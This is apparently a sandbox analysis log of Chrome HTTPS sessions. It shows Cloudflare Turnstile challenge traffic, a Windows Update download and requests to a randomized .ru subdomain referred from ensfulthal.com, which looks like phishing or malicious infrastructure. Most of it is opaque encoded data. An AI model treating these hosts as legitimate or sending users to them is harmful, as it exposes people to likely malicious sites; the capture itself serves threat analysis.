                                                                                          2024-11-27 14:15:22 UTC1369INData Raw: 4b 43 31 79 4c 69 6a 75 71 65 43 70 4a 32 4a 78 71 43 68 7a 4d 47 54 7a 4b 50 54 74 71 69 56 79 5a 76 55 77 39 75 2b 73 4a 33 52 6f 39 76 73 77 38 62 5a 71 71 2f 79 38 63 4c 63 7a 4d 75 31 30 4c 4c 36 2b 64 57 32 37 77 48 73 75 4d 4c 53 37 64 6a 50 31 76 44 67 33 38 6e 6b 78 4f 4d 4e 2f 4f 55 4e 30 75 7a 4f 43 42 6b 46 37 78 66 30 36 66 44 71 2f 68 50 33 49 79 4c 69 34 66 45 68 45 75 4d 63 4c 51 51 46 37 75 72 6d 4d 7a 54 78 49 51 30 78 39 76 54 7a 4c 44 45 55 43 68 51 32 2b 2f 73 30 2f 53 34 41 4f 44 6b 67 49 41 73 48 43 30 39 51 53 54 30 6f 54 52 51 69 45 45 6b 33 4d 43 59 77 55 68 30 59 55 44 4e 4b 4c 52 6f 77 58 42 31 58 48 6b 41 32 51 47 4d 36 4b 47 45 38 61 43 6c 6a 4b 6c 34 77 61 55 52 77 4d 58 73 79 56 45 70 55 64 6a 34 38 64 56 42 38 50 59 63 2b
                                                                                          Data Ascii: KC1yLijuqeCpJ2JxqChzMGTzKPTtqiVyZvUw9u+sJ3Ro9vsw8bZqq/y8cLczMu10LL6+dW27wHsuMLS7djP1vDg38nkxOMN/OUN0uzOCBkF7xf06fDq/hP3IyLi4fEhEuMcLQQF7urmMzTxIQ0x9vTzLDEUChQ2+/s0/S4AODkgIAsHC09QST0oTRQiEEk3MCYwUh0YUDNKLRowXB1XHkA2QGM6KGE8aCljKl4waURwMXsyVEpUdj48dVB8PYc+


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          28192.168.2.1649744104.18.94.414435868C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-27 14:15:23 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/402485251:1732713238:EPP0qg_mCX2wSLSk3LgW2rYMDy6RawIFteWI_N1yWy4/8e92ba946dde8cec/oxoBzRZd.2rPAaj3KTdMQYAfe03ZtWLPtKIgUvaVQmM-1732716910-1.1.1.1-ZdQvHX42IIDVzrlOFQN8fVuPzXoPXClRMRKYLY.Tl4cMaXpp_1EeO_rKdELfhZSM HTTP/1.1
                                                                                          Host: challenges.cloudflare.com
                                                                                          Connection: keep-alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                          Accept: */*
                                                                                          Sec-Fetch-Site: none
                                                                                          Sec-Fetch-Mode: cors
                                                                                          Sec-Fetch-Dest: empty
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          2024-11-27 14:15:24 UTC379INHTTP/1.1 404 Not Found
                                                                                          Date: Wed, 27 Nov 2024 14:15:24 GMT
                                                                                          Content-Type: application/json
                                                                                          Content-Length: 7
                                                                                          Connection: close
                                                                                          cf-chl-out: huTP4ucGF1ZBup/KvGqHY3i3eMsMj1kfKgM=$p/c66yMZn/7vifUS
                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e92bae7a98f7cfc-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          2024-11-27 14:15:24 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                          Data Ascii: invalid


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          29192.168.2.164974552.149.20.212443
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-27 14:15:26 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VOvE8RzO5wNHmSm&MD=BhyuRolF HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: */*
                                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                          Host: slscr.update.microsoft.com
                                                                                          2024-11-27 14:15:26 UTC560INHTTP/1.1 200 OK
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          Content-Type: application/octet-stream
                                                                                          Expires: -1
                                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                          ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                          MS-CorrelationId: 68c056b3-abc8-42de-b05e-b3e995090c4f
                                                                                          MS-RequestId: f57bc14b-51af-4588-b201-48f28eac491a
                                                                                          MS-CV: tUbOcMrHFU+RyB7A.0
                                                                                          X-Microsoft-SLSClientCache: 1440
                                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Date: Wed, 27 Nov 2024 14:15:26 GMT
                                                                                          Connection: close
                                                                                          Content-Length: 30005
                                                                                          2024-11-27 14:15:26 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                          Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                          2024-11-27 14:15:26 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                          Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          30192.168.2.1649748104.18.94.414435868C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-27 14:15:49 UTC1174OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/402485251:1732713238:EPP0qg_mCX2wSLSk3LgW2rYMDy6RawIFteWI_N1yWy4/8e92ba946dde8cec/oxoBzRZd.2rPAaj3KTdMQYAfe03ZtWLPtKIgUvaVQmM-1732716910-1.1.1.1-ZdQvHX42IIDVzrlOFQN8fVuPzXoPXClRMRKYLY.Tl4cMaXpp_1EeO_rKdELfhZSM HTTP/1.1
                                                                                          Host: challenges.cloudflare.com
                                                                                          Connection: keep-alive
                                                                                          Content-Length: 34058
                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                          Content-type: application/x-www-form-urlencoded
                                                                                          CF-Chl-RetryAttempt: 0
                                                                                          sec-ch-ua-mobile: ?0
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                          CF-Challenge: oxoBzRZd.2rPAaj3KTdMQYAfe03ZtWLPtKIgUvaVQmM-1732716910-1.1.1.1-ZdQvHX42IIDVzrlOFQN8fVuPzXoPXClRMRKYLY.Tl4cMaXpp_1EeO_rKdELfhZSM
                                                                                          sec-ch-ua-platform: "Windows"
                                                                                          Accept: */*
                                                                                          Origin: https://challenges.cloudflare.com
                                                                                          Sec-Fetch-Site: same-origin
                                                                                          Sec-Fetch-Mode: cors
                                                                                          Sec-Fetch-Dest: empty
                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hzi5z/0x4AAAAAAAz46PioTgf_NUpB/auto/fbE/normal/auto/
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          2024-11-27 14:15:49 UTC16384OUTData Raw: 76 5f 38 65 39 32 62 61 39 34 36 64 64 65 38 63 65 63 3d 47 71 2d 4f 65 6a 72 48 37 76 64 70 71 70 33 6a 49 70 50 70 41 56 4c 72 30 76 72 44 70 4a 4f 73 64 34 73 61 70 69 4f 2d 64 72 4e 70 36 4f 6a 2d 70 46 47 70 6f 4f 76 78 4f 70 77 2d 70 6c 4f 4a 6f 4e 72 62 30 4f 72 30 4e 38 4a 70 73 36 42 2d 72 70 7a 4f 72 47 70 2d 31 65 2d 2d 24 55 6a 4c 70 48 4f 72 33 70 6b 35 37 34 75 57 79 32 52 72 36 59 46 4f 50 24 66 65 33 70 4e 7a 48 33 51 59 55 56 4c 70 6c 56 56 70 70 73 79 70 73 77 55 34 4c 4f 77 70 42 64 70 76 4f 70 66 77 4f 6a 66 47 34 4b 2d 70 4c 71 70 31 32 41 71 4c 36 73 7a 6a 48 62 4b 78 59 73 62 77 62 76 4c 5a 30 64 4e 34 70 70 24 77 63 70 57 78 57 6b 32 61 2d 69 4c 4c 33 62 44 58 70 25 32 62 56 4a 53 2d 2b 2b 57 65 43 36 55 74 47 68 64 2b 2d 55 59 57
                                                                                          Data Ascii: v_8e92ba946dde8cec=Gq-OejrH7vdpqp3jIpPpAVLr0vrDpJOsd4sapiO-drNp6Oj-pFGpoOvxOpw-plOJoNrb0Or0N8Jps6B-rpzOrGp-1e--$UjLpHOr3pk574uWy2Rr6YFOP$fe3pNzH3QYUVLplVVppsypswU4LOwpBdpvOpfwOjfG4K-pLqp12AqL6szjHbKxYsbwbvLZ0dN4pp$wcpWxWk2a-iLL3bDXp%2bVJS-++WeC6UtGhd+-UYW
                                                                                          2024-11-27 14:15:49 UTC16384OUTData Raw: 70 4e 4f 56 61 56 70 72 57 62 61 4f 5a 55 36 55 76 64 4c 59 52 69 2d 33 70 34 6d 33 6d 71 4f 70 6e 4c 76 70 6a 2d 70 67 70 73 68 70 4f 70 49 4f 73 4f 72 46 2d 61 70 4a 2d 70 7a 49 33 4e 50 55 70 30 55 4c 4f 42 78 72 48 70 53 70 2d 2d 70 6b 70 64 4f 76 37 6b 43 70 6a 4f 4e 37 6a 64 70 73 4f 34 37 34 31 70 45 4f 4e 2d 72 49 70 2d 70 72 64 34 66 70 45 4f 70 71 72 4f 78 56 6a 47 75 72 57 4f 63 33 56 71 72 48 70 5a 4f 4e 4c 34 70 4e 70 4f 4a 44 70 58 59 2b 70 4e 62 72 61 70 79 75 4c 69 4a 33 70 75 64 72 36 44 46 70 78 57 56 78 6a 4c 70 78 55 76 46 70 37 70 38 70 53 78 41 77 72 64 4e 2d 55 6a 44 71 57 55 76 46 72 6c 4f 53 70 55 2d 56 61 79 32 47 70 2d 34 48 55 71 4f 55 78 56 35 42 56 77 6a 37 4c 79 72 4c 64 56 55 6f 59 78 79 2d 50 77 24 48 4f 6e 24 35 74 71 6c
                                                                                          Data Ascii: pNOVaVprWbaOZU6UvdLYRi-3p4m3mqOpnLvpj-pgpshpOpIOsOrF-apJ-pzI3NPUp0ULOBxrHpSp--pkpdOv7kCpjON7jdpsO4741pEON-rIp-prd4fpEOpqrOxVjGurWOc3VqrHpZONL4pNpOJDpXY+pNbrapyuLiJ3pudr6DFpxWVxjLpxUvFp7p8pSxAwrdN-UjDqWUvFrlOSpU-Vay2Gp-4HUqOUxV5BVwj7LyrLdVUoYxy-Pw$HOn$5tql
                                                                                          2024-11-27 14:15:49 UTC1290OUTData Raw: 24 33 47 4d 78 34 34 76 44 2b 74 71 72 32 70 61 59 79 44 33 53 32 59 38 53 48 53 2d 55 77 57 74 4c 6a 45 6f 42 38 53 48 53 52 36 70 58 37 55 70 6c 45 72 66 70 4f 34 76 32 62 70 73 48 33 6f 36 71 71 76 75 34 2d 37 72 4b 53 79 4c 73 70 47 71 4e 79 67 2b 62 53 59 53 76 77 24 74 73 2b 2d 55 70 77 70 34 6c 72 55 34 77 52 43 58 4a 70 2b 67 6e 50 69 59 33 32 64 70 56 65 50 55 70 6b 6f 6e 41 2d 2d 72 46 70 50 37 52 35 46 71 45 36 6d 62 24 32 58 70 2d 78 53 30 69 4c 6f 50 61 46 36 6a 58 70 32 4f 41 75 34 34 6f 71 71 4c 57 69 6f 36 70 65 53 4c 33 24 4a 68 47 6f 4e 32 4b 70 35 24 75 2d 34 69 30 34 55 55 4f 70 42 62 49 36 51 70 34 76 70 6a 43 77 6e 4e 77 51 4e 2d 47 42 32 6b 4f 4a 58 4b 6c 59 74 4f 6f 69 48 45 77 4b 4f 6a 32 75 78 34 38 70 2b 78 6a 6f 41 41 62 43 4c
                                                                                          Data Ascii: $3GMx44vD+tqr2paYyD3S2Y8SHS-UwWtLjEoB8SHSR6pX7UplErfpO4v2bpsH3o6qqvu4-7rKSyLspGqNyg+bSYSvw$ts+-Upwp4lrU4wRCXJp+gnPiY32dpVePUpkonA--rFpP7R5FqE6mb$2Xp-xS0iLoPaF6jXp2OAu44oqqLWio6peSL3$JhGoN2Kp5$u-4i04UUOpBbI6Qp4vpjCwnNwQN-GB2kOJXKlYtOoiHEwKOj2ux48p+xjoAAbCL
                                                                                          2024-11-27 14:15:50 UTC286INHTTP/1.1 200 OK
                                                                                          Date: Wed, 27 Nov 2024 14:15:50 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Content-Length: 4472
                                                                                          Connection: close
                                                                                          cf-chl-out: 0KHlCBBxPcn/hTVAjzEfeA0MThzmkqUxtOtR+Jcsw+M//wkiDQzvw6bbeIsWda3QO6WlpAO4qU6wB/kOOM10YBMstpIR9drk0q4O8dJ4pMZ+BPfvRh4S1Sw=$MjhEh3znX4fCnayN
                                                                                          2024-11-27 14:15:50 UTC1259INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 33 66 72 6f 66 38 36 50 4a 57 61 50 71 52 37 30 7a 69 6d 44 30 4f 2b 41 70 67 59 48 74 34 58 36 54 30 35 44 30 6d 32 44 4c 44 6d 4f 39 38 32 31 4e 43 56 78 58 6a 59 41 62 68 68 54 57 7a 63 7a 72 58 63 71 38 75 5a 54 42 4c 6d 6a 46 50 2f 74 6b 6c 6c 2b 45 54 6d 6a 62 67 78 59 5a 57 4c 4f 76 43 6e 7a 4a 51 73 2b 36 69 32 58 51 68 35 53 31 39 71 59 4c 44 33 33 4d 73 6e 51 71 6b 53 78 57 4b 51 64 52 63 4a 36 37 4e 76 63 4a 56 4f 73 39 6c 32 50 56 42 75 2f 47 42 2b 4a 38 53 44 78 6f 73 5a 45 52 4b 6e 52 39 6b 2f 57 78 6a 35 4f 56 68 53 4d 6f 67 35 4f 2f 6c 51 76 62 79 4d 63 7a 31 64 37 70 47 2f 33 53 31 7a 68 6f 58 44 35 35 5a 4d 69 39 31 4b 79 6a 45 4f 68 4e 50 71 62 31 79 38 41 32 46 69 31 50 7a 48 46 56 4d 6b 68 74
                                                                                          Data Ascii: cf-chl-out-s: 3frof86PJWaPqR70zimD0O+ApgYHt4X6T05D0m2DLDmO9821NCVxXjYAbhhTWzczrXcq8uZTBLmjFP/tkll+ETmjbgxYZWLOvCnzJQs+6i2XQh5S19qYLD33MsnQqkSxWKQdRcJ67NvcJVOs9l2PVBu/GB+J8SDxosZERKnR9k/Wxj5OVhSMog5O/lQvbyMcz1d7pG/3S1zhoXD55ZMi91KyjEOhNPqb1y8A2Fi1PzHFVMkht
                                                                                          2024-11-27 14:15:50 UTC1193INData Raw: 65 31 31 67 5a 32 61 4d 55 4a 71 46 61 56 68 56 69 33 78 63 58 6f 78 79 6b 70 68 78 6c 57 4e 6c 64 70 65 42 65 61 70 74 67 6d 35 74 72 6f 75 6a 62 6e 61 35 72 59 4f 78 68 62 4f 72 6d 36 71 55 6a 62 57 75 6d 4a 4b 51 6f 5a 69 58 79 72 71 33 70 61 43 71 75 63 4f 70 69 36 43 4d 31 4a 4b 50 6d 4e 65 7a 6a 39 2f 52 6d 4d 2b 38 35 4c 79 62 76 4a 37 45 6d 37 65 39 71 72 66 6d 32 74 6e 6a 71 72 50 71 7a 72 62 78 39 64 6d 78 7a 66 6e 4d 39 2b 66 34 76 77 44 6a 42 73 58 44 42 63 58 71 2b 38 66 4a 76 77 48 4c 2f 4f 67 47 39 4d 59 43 46 41 6a 30 38 65 76 37 35 52 73 4e 32 76 6e 32 44 67 54 36 38 42 45 48 46 4f 45 42 48 69 6b 62 49 4f 37 39 47 77 33 71 38 43 58 31 44 41 55 4e 38 76 4d 51 46 41 73 2b 46 6a 51 78 4c 53 51 54 50 7a 30 71 52 44 6f 44 4b 53 59 65 47 30 49
                                                                                          Data Ascii: e11gZ2aMUJqFaVhVi3xcXoxykphxlWNldpeBeaptgm5troujbna5rYOxhbOrm6qUjbWumJKQoZiXyrq3paCqucOpi6CM1JKPmNezj9/RmM+85LybvJ7Em7e9qrfm2tnjqrPqzrbx9dmxzfnM9+f4vwDjBsXDBcXq+8fJvwHL/OgG9MYCFAj08ev75RsN2vn2DgT68BEHFOEBHikbIO79Gw3q8CX1DAUN8vMQFAs+FjQxLSQTPz0qRDoDKSYeG0I
                                                                                          2024-11-27 14:15:50 UTC1369INData Raw: 65 66 4d 41 67 6f 45 30 39 6b 52 30 39 33 6d 43 67 76 63 48 68 33 6b 34 75 59 48 35 4f 6b 71 4c 53 34 76 48 43 6b 4b 36 51 6f 31 36 75 77 30 4e 54 58 35 45 6a 45 34 2b 78 50 39 49 50 77 79 50 52 63 56 4e 6b 56 4b 41 44 6b 35 4f 41 6b 6d 4c 30 68 53 4c 44 4d 73 45 31 59 57 46 42 4e 57 4b 78 6b 6d 4a 79 68 51 4b 6a 74 4f 4c 53 46 6a 58 6c 51 79 61 43 49 73 62 69 38 6e 4f 58 4a 4e 51 7a 45 7a 64 6c 64 4c 65 31 42 50 57 54 6c 55 61 6d 6b 36 57 6d 4e 74 52 45 64 58 68 55 46 34 68 6c 5a 45 6a 31 69 41 6b 70 47 42 55 31 43 56 67 6f 4e 4d 6c 70 46 33 55 49 79 56 65 6d 47 64 57 35 46 30 66 6d 64 79 59 49 43 4c 62 47 69 47 5a 6f 35 74 6a 4a 42 2b 67 36 47 71 70 58 4f 6f 72 58 52 31 6b 33 36 63 67 4d 47 54 73 58 68 39 78 5a 75 53 6c 49 62 4e 6e 70 6d 62 72 35 4c 41
                                                                                          Data Ascii: efMAgoE09kR093mCgvcHh3k4uYH5OkqLS4vHCkK6Qo16uw0NTX5EjE4+xP9IPwyPRcVNkVKADk5OAkmL0hSLDMsE1YWFBNWKxkmJyhQKjtOLSFjXlQyaCIsbi8nOXJNQzEzdldLe1BPWTlUamk6WmNtREdXhUF4hlZEj1iAkpGBU1CVgoNMlpF3UIyVemGdW5F0fmdyYICLbGiGZo5tjJB+g6GqpXOorXR1k36cgMGTsXh9xZuSlIbNnpmbr5LA
                                                                                          2024-11-27 14:15:50 UTC1369INData Raw: 7a 33 43 51 72 2b 39 2b 37 67 48 78 54 39 46 78 33 67 48 68 30 69 42 67 4d 67 36 2f 6b 51 44 65 34 43 42 79 6a 78 39 41 38 74 39 54 77 61 4d 54 30 65 4f 54 45 41 4c 6b 49 2b 46 6b 64 44 47 54 55 4b 48 78 38 6e 52 45 46 48 4d 77 34 48 48 79 38 6e 51 78 67 7a 4e 79 38 6e 4e 6c 55 65 46 44 6c 5a 56 78 68 51 55 6c 63 37 51 44 59 39 62 43 6c 47 52 31 42 45 52 6d 6c 6e 54 30 39 33 51 6a 46 74 66 54 56 32 67 48 4e 30 63 58 46 44 4f 48 52 6a 52 46 4a 34 56 46 61 41 54 47 6c 6e 6b 58 4a 4b 68 6b 35 54 6d 59 61 4a 56 4a 42 32 6d 46 36 49 64 70 4f 4e 62 6e 4b 5a 64 61 43 64 70 4a 52 70 72 71 32 50 68 6e 75 78 71 33 42 72 73 59 70 75 69 4b 71 6b 6c 34 75 75 6f 4a 36 53 73 35 57 53 68 62 69 2b 67 63 57 35 78 61 4b 6b 76 37 66 52 6d 73 4f 38 76 4d 72 51 7a 38 47 6d 32
                                                                                          Data Ascii: z3CQr+9+7gHxT9Fx3gHh0iBgMg6/kQDe4CByjx9A8t9TwaMT0eOTEALkI+FkdDGTUKHx8nREFHMw4HHy8nQxgzNy8nNlUeFDlZVxhQUlc7QDY9bClGR1BERmlnT093QjFtfTV2gHN0cXFDOHRjRFJ4VFaATGlnkXJKhk5TmYaJVJB2mF6IdpONbnKZdaCdpJRprq2Phnuxq3BrsYpuiKqkl4uuoJ6Ss5WShbi+gcW5xaKkv7fRmsO8vMrQz8Gm2
                                                                                          2024-11-27 14:15:50 UTC541INData Raw: 53 33 76 45 46 48 52 48 31 48 53 55 6c 2b 53 67 66 4a 2f 30 74 49 42 33 2b 2f 6a 55 4c 43 77 63 30 39 77 6f 34 4f 2f 77 53 48 6b 45 6a 49 78 4a 41 41 66 6c 46 51 51 6f 65 4a 54 73 4b 53 42 6c 46 49 79 49 6f 54 43 6b 53 4a 30 64 56 4a 6a 5a 62 47 6a 35 56 56 55 52 55 48 46 34 6a 49 52 74 6b 4f 79 6c 4a 5a 31 67 2f 4f 57 70 55 58 48 5a 75 4e 6c 4a 47 61 58 56 4c 52 6d 35 7a 65 48 43 41 56 58 4e 38 66 31 64 77 59 6e 39 48 58 31 69 46 59 47 71 4e 69 6d 4e 71 58 34 64 53 56 45 2b 4e 62 47 71 56 6d 58 47 63 63 4a 6d 58 6d 48 47 68 6f 48 5a 78 6d 4b 47 4b 64 35 32 6c 66 6e 36 73 6e 49 4b 41 70 61 32 43 75 61 68 31 65 59 6d 34 71 4a 4b 4f 73 5a 4f 57 78 62 53 43 74 4a 69 35 77 48 37 4f 79 63 57 6d 6f 4d 47 6d 71 6f 33 51 30 4b 61 68 79 4e 47 32 71 73 32 75 6b 71
                                                                                          Data Ascii: S3vEFHRH1HSUl+SgfJ/0tIB3+/jULCwc09wo4O/wSHkEjIxJAAflFQQoeJTsKSBlFIyIoTCkSJ0dVJjZbGj5VVURUHF4jIRtkOylJZ1g/OWpUXHZuNlJGaXVLRm5zeHCAVXN8f1dwYn9HX1iFYGqNimNqX4dSVE+NbGqVmXGccJmXmHGhoHZxmKGKd52lfn6snIKApa2Cuah1eYm4qJKOsZOWxbSCtJi5wH7OycWmoMGmqo3Q0KahyNG2qs2ukq


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          31192.168.2.1649749104.18.94.414435868C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-27 14:15:51 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/402485251:1732713238:EPP0qg_mCX2wSLSk3LgW2rYMDy6RawIFteWI_N1yWy4/8e92ba946dde8cec/oxoBzRZd.2rPAaj3KTdMQYAfe03ZtWLPtKIgUvaVQmM-1732716910-1.1.1.1-ZdQvHX42IIDVzrlOFQN8fVuPzXoPXClRMRKYLY.Tl4cMaXpp_1EeO_rKdELfhZSM HTTP/1.1
                                                                                          Host: challenges.cloudflare.com
                                                                                          Connection: keep-alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                          Accept: */*
                                                                                          Sec-Fetch-Site: none
                                                                                          Sec-Fetch-Mode: cors
                                                                                          Sec-Fetch-Dest: empty
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          2024-11-27 14:15:52 UTC379INHTTP/1.1 404 Not Found
                                                                                          Date: Wed, 27 Nov 2024 14:15:51 GMT
                                                                                          Content-Type: application/json
                                                                                          Content-Length: 7
                                                                                          Connection: close
                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                          cf-chl-out: sSkUASCSU9aGM4eIqaK20KOas0TALMkgjqU=$dknDctx9IlE6G7mm
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e92bb952b5dc47f-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          2024-11-27 14:15:52 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                          Data Ascii: invalid


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          32192.168.2.1649751172.67.191.2004435868C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-27 14:15:53 UTC693OUTGET /cqsexwwlxyuecdhcrtjjbsoAZYBxFfQAMRTUSVYOZCJLQOZPLUPCIQKGNSLZZRBCBRDDLGVVIXOUXMGZYCOOSMSKX HTTP/1.1
                                                                                          Host: u91ndqfef6ahbx8nw9xixpx17ig1uuxy5g2sbqn7uf6ocw1sehswzqp7qctp.birsbunh.ru
                                                                                          Connection: keep-alive
                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                          sec-ch-ua-mobile: ?0
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                          sec-ch-ua-platform: "Windows"
                                                                                          Accept: */*
                                                                                          Origin: https://1z.ensfulthal.com
                                                                                          Sec-Fetch-Site: cross-site
                                                                                          Sec-Fetch-Mode: cors
                                                                                          Sec-Fetch-Dest: empty
                                                                                          Referer: https://1z.ensfulthal.com/
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          2024-11-27 14:15:54 UTC903INHTTP/1.1 200 OK
                                                                                          Date: Wed, 27 Nov 2024 14:15:54 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Access-Control-Allow-Origin: *
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TmSm2FFoOSTwYkiw6nh1J5o3EZSWbNtezuRYkPSLkCmS8mpc5sXSYtO56pxaQhJfCGOxnUbJlF7a45zEuDYF144JuTOvrPbJOpp%2FtHk6evcj9oWoeM1mNwKkbK8GkEEiuI%2F8Wqv3%2B05r96AboiEcVGICKcpAacRdM1X7eZXGVrpEf6IDMhOz2kY%2F6AKbFAofC%2BHGvEUFP7%2B7FAU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e92bba099e36a5b-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1757&min_rtt=1754&rtt_var=664&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1271&delivery_rate=1639528&cwnd=193&unsent_bytes=0&cid=37f4ee4df91aad28&ts=1158&x=0"
                                                                                          2024-11-27 14:15:54 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                          Data Ascii: 11
                                                                                          2024-11-27 14:15:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          33192.168.2.1649753104.21.11.984435868C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-27 14:15:57 UTC485OUTGET /cqsexwwlxyuecdhcrtjjbsoAZYBxFfQAMRTUSVYOZCJLQOZPLUPCIQKGNSLZZRBCBRDDLGVVIXOUXMGZYCOOSMSKX HTTP/1.1
